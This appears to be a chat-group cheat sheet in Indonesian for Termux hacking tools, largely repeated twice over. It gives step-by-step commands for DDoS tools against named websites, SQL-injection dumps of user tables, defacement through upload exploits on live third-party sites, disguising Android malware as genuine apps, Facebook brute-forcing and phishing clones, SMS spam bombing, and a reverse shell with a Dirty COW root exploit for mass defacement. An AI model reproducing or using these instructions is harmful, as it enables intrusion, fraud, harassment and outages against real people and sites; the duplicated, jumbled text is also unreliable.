$ ls $ cd AdminFinder $ chmod 777 AdminFinder.py $ python2 AdminFinder.py *Cara install tool Mr.Rv1.1* $apt update && apt upgrade $pkg install git $pkg install gem $pkg install figlet $gem install lolcat $git clone https://github.com/Mr-R225/Mr.Rv1.1 $cd Mr.Rv1.1 $sh Mr.Rv1.1.sh tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools TOOL FSOCIETY $ git clone https://github.com/manisso/fsociety $ cd fsociety $ ./install.sh $ ls $ python2 fsociety.py SQLMAP apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap https://github.com/sqlmapproject/sqlmap.git cd sqlmap Python2 sqlmap.py Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run TOOL D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py DEFACE Hacking Script-Deface $apt update $apt upgrade $apt install git $apt install python2 $git clone https://github.com/Ubaii/script-deface-creator $ls $cd script-deface-creator $ls $chmod +x create.py $ls $python2 create.py done semoga bisa bikin script Html CARA DEFACE Cara1 Siapkan script sendiri.. 1.buka browser kalian apa saja terserah lalu ke google 2.tulis dork nya berikut ini (inurl:"sitefinity/login.aspx) tanpa tanda buka kurung dan tutup kurung! lalu search 3.pilih lah salah satu website terserah kalian,klik website nya lalu tambahkan exploit nya sebagai berikut (sitefinity/usercontrols/dialog/documenteditordialog.aspx) tanpa buka tutup kurung! E http://sitetarget*org/sitefinity/usercontrols/dialogs/documenteditordialog.aspx 4.lalu klik search kembali! nah disitu kalian klik chose file dan pilih script deface punya kalian 5.klik yang di bawah nya tunggu sampai loading selesai 6.tambah link target tadi dengan (/files) contoh http://sitetarget*org/files/namascriptdefacekalian.html lalu klik search 7.selesai!! Cara2 Method/metode KCFinder Inurl:/kcfinder/browse.php Inurl:/Kcfinder/ Langsung saja upload file deface anda,lalu panggil dengan tambahan /file/namasckamu.html Contoh: https://basukiwater.com/kcfinder/browse.php jadi https://basukiwater.com/file/namasckamu.html cara3 Deface Onion.to File Upload Tutor ini sekarang lagi Ngtreend & Simple , tapi ingat ya bukan Deepweb melaikan Fake Deepweb hehehe... Mari kita Lanjut... Dork : - inurl:/upload site:.onion.to - intext:"Upload" site:.onion.to Live : https://tt3j2x4k5ycaa5zt.onion.to/upload.php Step By Step : 1. Dorking Dulu 2. Pilih Web Target 3. Pilih File yang mau di'upload 4. Tinggal klik Upload => Done 😆 Contoh Target : https://tt3j2x4k5ycaa5zt.onion.to/uploads/lopeyou.html https://danwin1210.me/uploads/lopeyou.html https://temp.xn--wda.fr/e719x8JgJ.html Mirror?! 😆 https://www.defacer.id/296011.html https://www.defacer.id/296024.html cara4 Metode com media Bahan : 1. Dork : - inurl:com_media site:com - inurl:com_media intext:"Upload" 2. Exploit : /index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 3. Upload'an : Format .txt 😁 Live Target : http://www.james-insurance.co.uk/ Step by Step : gunakan Live Targert dulu untuk Uji Coba 😁 1. Masukkan dork : inurl:com_media intext:"Upload" site:co.uk 2. Pilih salah satu Web 3. Masukkan Exploit http://www.james-insurance.co.uk/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder= 4. Lalu Upload file dalam tempat upload ( format .txt ) Akses shell ? Tambahkan : /images/namafile.txt contoh : http://www.james-insurance.co.uk/images/fac.txt Nanti Jadi Gini Hasilnyaa.. Mudah Bukan?! Tinggal Upload ke Defacer.id 😁 cara5 [POC] Vulnerability Simplicity Of Upload #Step 1: Dork: “Powered By: © Simplicity oF Upload” #Step 2: Exploit: http://[situstargetkamu]/PATH/upload.php *Tergantung dengan target. #Step 3: llowed file: gif, jpg, png, txt, php, asp, cgi, zip, exe, mp3, etc (not allowed for html) #Step 4: Preview: http://[situstargetkamu]/upload/[Your File] #Step 5: Live Demo: http://www.railfaneurope.net/pix/upload.php http://www.formplas.com/upload/upload.php *Di google masih banyak kok Nah, saya kira cukup segitu aja kok, karena mudah tuh tutorial nya. Kalau masih ada yang bin [8/11 06.41] ‪+62 838-5688-2861‬: TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target set port 8080 set threads 10 masukkan exploitsnya set target -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url http://facebook.com $ set action_url http://facebook.com run (Bisa diganti phising nya, kalau Twitter ya bisa ataupun yg lain) *Ikuti Langkah Demi Langkah* (````Install``` *Hunner framework*) $ apt update $ apt install python $ apt install git -y $ git clone https://github.com/b3-v3r/Hunner $ cd Hunner $ chmod 777 hunner.py $ python hunner.py Ikuti Langkah Demi Langkah (```Install``` *SQLMAP*) $ apt update $ apt install python $ apt install python2 $ apt install git $ gi clone https://github.com/sqlmapproject/sqlmap $ cd sqlmap $ Python2 sqlmap.py Exemple:- Python2 sqlmap.py -u website --dbs -D acuart --tables -D acuart -T users --columns -D acuart -T users -C name,email,phone -dump Ikuti Langkah Demi Langkah Lacak ip git clone https://github.com/maldevel/IPGeolocation cd IPGeolocation chmod +x ipgeolocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t IP yang ingin dilacak bbom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjh --------------------------------------------------------------------- *1.Spammer SMS Grab Install Spammernya dulu* $pkg install python2 $pip2 install requests $pkg install git $git clone https://github.com/p4kl0nc4t/Spammer-Grab $cd Spammer-Grab $ls $chmod +x spammer.py $python2 spammer.py --delay 30 nomor korban. --------------------------------------------------------------------------------------- *Cara Install Lazymux di Termux* $ pkg update && upgrade $ pkg install python2 $ pkg install git $ git clone https://github.com/Gameye98/Lazymux $ cd Lazymux $ chmod +x lazymux.py $ python2 lazymux.py --------------------------------------------------------------------------------------- *2.Cara install tools daijobu* Fungsinya nanti liat sendiri lah di dalem tools nya $apt upgrade && apt update $apt install php $apt install git Kalo udah selesai langsung masukan git nya dengan perintah $git clone https://github.com/alintamvanz/diejoubu $cd diejoubu $cd v1.2 $php diejoubu.php --------------------------------------------------------------------------------------- 3. Install webdav $ apt update && upgrade $ apt install python2 $ pip2 install urllib3 chardet certifi idna requests $ apt install openssl curl $ pkg install libcurl $ ln -s /sdcard $ cd sdcard $ mkdir webdav $ cd webdav $ curl -k -O https://pastebin.com/raw/HnVyQPtR $ mv HnVyQPtR webdav.py $ python2 webdav.py --------------------------------------------------------------------------------------- *2. Xerxes* $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 --------------------------------------------------------------------------------------- *3. Torshammer* $ pkg update $ pkg install git $ Pkg install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py -T -t seword.com ( web y ang kalian attack ) #mr khanz'''TOOL TERMUX Cara Install D-tect tool di android termux (command ) : $ apt install git $ apt install python2 $ git clone https://github.com/shawarkhanethicalhacker/D-TECT $ ls $ cd D-TECH $ chmod +x d-tect.py $ python2 d-tect.py cara uninstall tool termux rm -rf toolsnya cara buat virus cd /sdcard cd vbug ls chmod vbug.py chmod -v vbug.py python2 vbug.py irssi /connet irc.freenode.net /nick w3wandroid /join #modol _________________________ DDOS via Termux 1. Hammer $ pkg update (tekan enter) $ pkg upgrade (tekan enter) $ pkg install python (tekan enter) $ pkg install git (tekan enter) $ git clone https://github.com/cyweb/hammer (tekan enter) $ cd hammer (tekan enter) $ python hammer.py (tekan enter) $ python hammer.py -s [IP target] -p [port] -t 135 (tekan enter) 2. Xerxes $ apt install git $ apt install clang $ git clone https://github.com/zanyarjamal/xerxes $ ls $ cd xerxes $ ls $ clang xerxes.c -o xerxes $ ls $ ./xerxes (nama website) 80 3. Torshammer $ pkg update $ pkg install git $ apt install tor $ pkg install python2 $ git clone https://github.com/dotfighter/torshammer.git $ ls $ cd torshammer $ python2 torshammer.py 4. liteDDOS $ apt update $ apt upgrade $ pkg install git $ pkg install python2 $ git clone https://github.com/4L13199/LITEDDOS $ cd LITEDDOS $ python2 liteDDOS.py _________________________________________ Bermain moon-buggy $ pkg install moon-buggy $ moon-buggy ________________________________________ musikan di termux $ pkg install mpv $ mpv/sdcard/lagu.mp3 /sdcard/ bisa di ganti sesuai letak musik ________________________________________ Browsing di termux $ pkg install w3m $ w3m www.google.com Linknya bsa diubah ________________________________________ Telephone di termux $ pkg install termux-api $ termux-telephony-call nomornya _______________________________________ Menampilkan animasi kereta :v $ pkg install sl $ sl _______________________________________ menampilkan ikon dan informasi sistem android $ pkg install neofetch $ neofetch _______________________________________ menampilkan teks dalam format ASCII $ pkg install figlet $ figlet masukin teksnya _______________________________________ $ pip install mps_youtube $ pip install youtube_dl $ apt install mpv $ mpsyt $ /judul lagu Tinggal pilih lagu dgn mengetik nomornya.  Tutorial membuat virus seperti aplikasi aslinya🚨 Tools yang dibutuhkan: APK Editor & tool vbug APK Editor bisa didownload di playstore Tool vbug https://www.mediafire.com/file/6hs6y71ryw10uvw/vbug.zip 1. Download tool vbugnya dulu 2. Taruh file tool vbug di luar folder pada memori internal 3. Buka termux lalu $ cd /sdcard 4. $ unzip vbug.zip 5. $ cd vbug 6. $ python2 vbug.py 7. Enter 8. Ketik 10 9. Ketik E 10. Aplikasi virusnya sudah jadi Setelah aplikasinya jad kita tinggal edit supaya mirip aslinya 1. Buka APK Editor 2. Klik Select an Apk File 3. Pilih aplikasi virus tadi 4. Klik full edit 5. Pada bagian kolom app_name tulis nama aplikasi yang kalian inginkan 6. Lalu klik files 7. Klik res/drawable 8. Logo yang kedua itu ganti dengan logo aplikasi yang kalian inginkan Catatan: format logo harus .png 9. Ceklist logo yang kedua lalu replace 10. Pilih file logo yang mau dijadikan logo aplikasi agan 11. Back sampai home Supaya aplikasi terlihat lebih nyata kita harus beri bobot pada aplikasi buatan kita 12. Klik tanda plus yang ada di bawah kiri, pilih file, lagu, gambar atau apapun yang coxok sebagai bobot apliaksi agan 13. Klik build 14. Tunggu hingga selesai 15. Jadi deh auto boot fb git clone https://github.com/Senitopeng/BotFbBangDjon.git cd BotFbBangDjon python2 bangdjon.py melihat id fb https://findmyfbid.in/ git clone https://github.com/tomiashari/fb-autoreaction.git cd fb-autoreaction python2 fb-autoreaction cara membuat virus cd Vbug/vbug.py cd /storage/emulated/0/Vbug cd vbug Python2 vbug.py CRACK PASSWORD HASH git clone https://github.com/FajriHidayat088/FHX-Hash-Killer/ cd FHX-Hash-Killer python2 FHXHashKiller.py git clone https://github.com/UltimateHackers/Hash-Buster $ cd Hash-Buster $ python2 hash.py pkg install irssi irssi (enter) /connect chat.freenode.net /nick oki /join #mrmaze Cara install Metasploit di termux (No Root) ~ apt update && apt upgrade ~ apt install curl ~ curl -LO https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh ~ chmod +x metasploit.sh ~ ./metasploit.sh ... Tunggu proses instalasi sekitar 30-40 menit tergantung koneksi internet ... ( hack fb via termux ) $apt update $apt upgrade $apt install python2 $apt install python2-dev $apt install wget $dip2 install mechanize $cd/sterage/emulated/0 $python2 fbbrute.py ( yg tdi di download di tunda di luar folder ) $storage/emulated/0/fassword.txt ( sama kya yang tadi di download trus tinda di luar folder ) =tinggal tunggu fassword nya muncul Jika beruntung *silahkan mencoba* tool install $ apt update && apt upgrade $ apt install git $ git clone https://github.com/aryanrtm/4wsectools cd 4wsectools chmod 777 tools ./tools pip install mps_youtube pip install youtube_dl apt install mpv mpsyt /judul $ pkg update && pkg upgrade CHATTING VIA TERMUX $ pkg install irssi $ irssi $ /connect chat.freenode.net $ /nick 1235 12345 di ganti sesuai nama/nick agan $ /join #XCAteam 100% work boom spam apt upgrade && apt update apt install git git clone https://github.com/Amriez/gcospam cd gcospam sh install.sh sh gco.sh Pilih nomer yang mana ajjh Lalu Masukan nomer tanpa 0/62 Input bebas Jeda default ajjhj +6282399188718 Spam bom mall $ pkg install update $ pkg install upgrade $ pkg install wget $ pkg install php $ wget http://files-store.theprivat.ml/uploads/bom-mall.zip $ unzip bom-mall.zip $ cd bom-mall $ php run.php (```Install``` *SpamTsel*) $ pkg install curl $ pkg install php $ curl -s http://files-store.theprivat.ml/uploads/bombtsel.txt > bombtsel.php $ chmod 777 bombtsel.php $ php bombtsel.php 3) Tool Spam LITESPAM $ pkg install php $ pkg install toilet $ pkg install sh $ pkg install git $ git clone https://github.com/4L13199/LITESPAM $ cd LITESPAM $ sh LITESPAM.sh atau bash LITESPAM.sh Masukan Nomer nya... VBugMaker Termux -apt update && apt upgrade -apt install git -apt install python Donwload file ->http://upfile.mobi/YGwg8gQLuvv Pindah ke directory Next -unzip vbug.zip -mv vbug $HOME -cd vbug -ls -chmod +x vbug.py -python2 vbug.py #Done Cara Root Server Di Termux Dengan Ngrok Perl/PHP BackConnecter Mass Deface. 1. Install~ Buka Termux 2. Install Ngrok Registrasi Autthokennya. (http://ngrok.com/download;http://ngrok.com/signup) $ wget https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-linux-arm.zip $ unzip ngrok-stable-linux-arm.zip ngrok $ ./ngrok authtoken JWJDKNxxxxxxxxxx $ ./ngrok tcp port :~# Welcome : Plan Free "0.tcp.ngrok.io:port-ngrok ~> localhost:port" 3. Download Perl/PHP Backconnecter (http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) dan Edit file nya, cari $ip dan $port ganti dengan (0.tcp.ngrok.io:port-ngrok) ~>Upload ke website (PERL: ON)(PHP: ON) 5. in termux command : $ nc -lnvp port 6. in backdoor shell : $ perl perl-reverse-shell.pl (atau) > http://situs.co.li/perl-reverse-shell.php (Run the script simply by browsing to the newly uploaded file in your web browser) .----(after backconnect successfully)--- 7. upload LOCALROOT $ wget https://domain.com/localroot/dirty $ chmod 777 dirty $ ./dirty New password: ndasmu (successfully rooted) 8. import TTY shell ===>jika menggunakan dirty<=== $ echo "import pty; pty.spawn('/bin/bash')" > /tmp/sad.py $ python /tmp/sad.py ===>jika menggunakan cowroot<=== $ python -c 'import pty;pty.spawn("/usr/bin/passwd")' (https://evertpot.com/189/) .-------------------------------------------- 9. login as ROOT $ su rintoar Password: ndasmu .-------------------------------------------- 10 ./mass (https://m.youtube.com/watch?v=HPQQok40v78) .-------------------------------------------- WEEMAN [✓] apt update && apt upgrade -y apt install git -y apt install python2 -y git clone https://github.com/evait-security/weeman cd weeman chmod 777 weeman.py python2 weeman.py Ex set url http://facebook.com set action_url http://facebook.com run ___________________________________________ Hunner framework apt update apt install python apt install git -y git clone https://github.com/b3-v3r/Hunner cd Hunner chmod 777 hunner.py python hunner.py ___________________________________________ SQLMAP [✓] apt update apt install python apt install python2 apt install git git clone https://github.com/sqlmapproject/sqlmap cd sqlmap Python2 sqlmap.py ______ Exemplo Python2 sqlmap.py -u website –dbs -D acuart –tables -D acuart -T users –columns -D acuart -T users -C name,email,phone -dump ___________________________________ DDOS XERXES [✓] clang xerxes.c -o xerxes ./xerxes website 80 ___________________________________ DDOS TORSHAMMER [✓] apt-get update apt-get install python2 apt-get install tor apt-get install git git clone https://github.com/dotfighter/torshammer.git cd torshammer python2 torshammer.py -T -t website ___________________________________ BRUTEFORCE [✓] apt update apt upgrade apt install python apt install pip pip install wordlist apt install worlist Wordlist -h cd /sdcard Cat pas.txt ___________________________________ Localizar ip Apt install python git git clone https://github.com/maldevel/IPGeoLocation.git cd IPGeoLocation chmod +x ipgeoLocation.py pip install -r requirements.txt python ipgeolocation.py -m python ipgeolocation.py -t http://www.google.com ___________________________________ Hecker RECONDOG apt update apt install python python2 apt install git git clone https://github.com/UltimateHackers/ReconDog cd ReconDog chmod +x dog.py Python2 dog.py ___________________________________ BUSCA PAINEL ADM DE SITE pkg install git git clone https://github.com/Techzindia/admin_penal cd admin_penal chmod +x admin_panel_finder.py python2 admin_panel_finder.py ___________________________________ HAKKU apt install pytho apt install git mkdir vasu git clone https://github.com/4shadoww/hakkuframework cd hakkuframework chmod +x hakku python hakku show modules use whois show options set target examplesite.com run ___________________________________________ RED HAWK apt update apt install git git clone https://github.com/Tuhinshubhra/RED_HAWK cd RED_HAWK chmod +x rhawk.php apt install php ls php rhawk.php ___________________________________________ D-TECT apt update apt install git git clone https://github.com/shawarkhanethicalhacker/D-TECT cd D-TECT apt install python2 chmod +x d-tect.py python2 d-tect.py examplesite.com ___________________________________________ viSQL apt update apt install python2 apt install git git clone https://github.com/blackvkng/viSQL cd viSQL python2 -m pip install -r requirements.txt python2 viSQL.py python2 viSQL.py -t http://www.bible-history.com __________________ Hash Buster apt update apt upgrade apt install python2 apt install git git clone https://github.com/UltimateHackers/Hash-Buster cd Hash-Buster python2 hash.py PERKIRAAN cuaca curl http://wttr.in/ (lokasi) tool Routersploit apt install git apt install python2 pip2 install requests git clone https://github.com/reverse-shell/routersploit.git cd routersploit pip install -r requirements.txt termux-fix-shebang rsf.py Cara pake cd routersploit ./ rsf.py use scanners/autopwn show options set target set port 8080 set threads 10 masukkan exploitsnya set target -check -run tool ubuntu $ apt update $ apt install git $ apt install wget $ apt install proot $ git clone https://github.com/Neo-Oli/termux-ubu&#8230; $ cd termux-ubuntu $ chmod +x ubuntu.sh $ ./ubuntu.sh $ ./start.sh (```Install``` *Weeman* ) $ apt update && apt upgrade -y $ apt install git -y $ apt install python2 -y $ git clone https://github.com/evait-security/weeman $ cd weeman $ chmod 777 weeman.py $ python2 weeman.py Contoh $ set url 